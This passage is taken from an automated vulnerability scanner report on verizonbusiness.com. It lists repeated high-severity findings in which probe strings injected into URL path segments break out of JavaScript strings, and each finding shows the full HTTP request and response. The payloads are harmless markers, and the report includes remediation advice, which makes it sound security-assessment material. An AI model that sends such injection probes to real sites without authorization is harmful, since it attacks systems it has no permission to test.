Date: Wed, 17 Nov 2010 00:42:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products77697';7b5dd88adbe/communications/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.29. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3394a"%3bc776f339cc0 was submitted in the REST URL parameter 2. This input was echoed as 3394a";c776f339cc0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications3394a"%3bc776f339cc0/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:57 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:57 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications3394a";c776f339cc0/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.30. http://www.verizonbusiness.com/Products/communications/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8f05'%3b973ed6f0057 was submitted in the REST URL parameter 2. This input was echoed as a8f05';973ed6f0057 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsa8f05'%3b973ed6f0057/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:16 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42311
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:16 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:16 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communicationsa8f05';973ed6f0057/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.31. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35c45"%3b3446886f3f4 was submitted in the REST URL parameter 1. This input was echoed as 35c45";3446886f3f4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products35c45"%3b3446886f3f4/communications/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:24 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40672
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products35c45";3446886f3f4/communications/conferencing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MIN
...[SNIP]...

1.32. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload efaf8'%3b0851e56f04c was submitted in the REST URL parameter 1. This input was echoed as efaf8';0851e56f04c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Productsefaf8'%3b0851e56f04c/communications/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:33 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Productsefaf8';0851e56f04c/communications/conferencing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.33. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4046a'%3bcd2d56fb13f was submitted in the REST URL parameter 2. This input was echoed as 4046a';cd2d56fb13f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications4046a'%3bcd2d56fb13f/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:58 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42337
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:58 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:58 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications4046a';cd2d56fb13f/conferencing/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.34. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4625"%3b3f6eb6b4c4d was submitted in the REST URL parameter 2. This input was echoed as f4625";3f6eb6b4c4d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communicationsf4625"%3b3f6eb6b4c4d/conferencing/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:39 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42339
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:44:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communicationsf4625";3f6eb6b4c4d/conferencing/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS O
...[SNIP]...

1.35. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fbd7'%3bf2b5ced80de was submitted in the REST URL parameter 3. This input was echoed as 4fbd7';f2b5ced80de in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/conferencing4fbd7'%3bf2b5ced80de/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:45:34 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 43482
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications/conferencing4fbd7';f2b5ced80de/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.36. http://www.verizonbusiness.com/Products/communications/conferencing/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/conferencing/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58713"%3b215198f4b7 was submitted in the REST URL parameter 3. This input was echoed as 58713";215198f4b7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/conferencing58713"%3b215198f4b7/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:45:04 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43480
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:45:04 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:45:04 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications/conferencing58713";215198f4b7/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.37. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78cd5"%3b14faafd3cd7 was submitted in the REST URL parameter 1. This input was echoed as 78cd5";14faafd3cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products78cd5"%3b14faafd3cd7/communications/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:17 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40676
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products78cd5";14faafd3cd7/communications/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION M
...[SNIP]...

1.38. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ab66'%3b124b3146f2 was submitted in the REST URL parameter 1. This input was echoed as 7ab66';124b3146f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products7ab66'%3b124b3146f2/communications/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:28 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40674
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:28 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:28 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/Products7ab66';124b3146f2/communications/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.39. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a6b6'%3be97dc6b393c was submitted in the REST URL parameter 2. This input was echoed as 7a6b6';e97dc6b393c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications7a6b6'%3be97dc6b393c/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:43:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 42341
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:43:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:43:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/Products/communications7a6b6';e97dc6b393c/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.40. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e2bc"%3bdf2b6c45fef was submitted in the REST URL parameter 2. This input was echoed as 6e2bc";df2b6c45fef in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications6e2bc"%3bdf2b6c45fef/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:42:55 GMT
Content-Type: text/html
Content-Length: 42343
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:42:56 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:42:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/Products/communications6e2bc";df2b6c45fef/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.41. http://www.verizonbusiness.com/Products/communications/contact-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /Products/communications/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e288'%3beb8b904ab32 was submitted in the REST URL parameter 3. This input was echoed as 9e288';eb8b904ab32 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Products/communications/contact-center9e288'%3beb8b904ab32/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:44:09 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 43486
Date: Wed, 17 Nov 2010 00:44:09 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:44:09 GMT

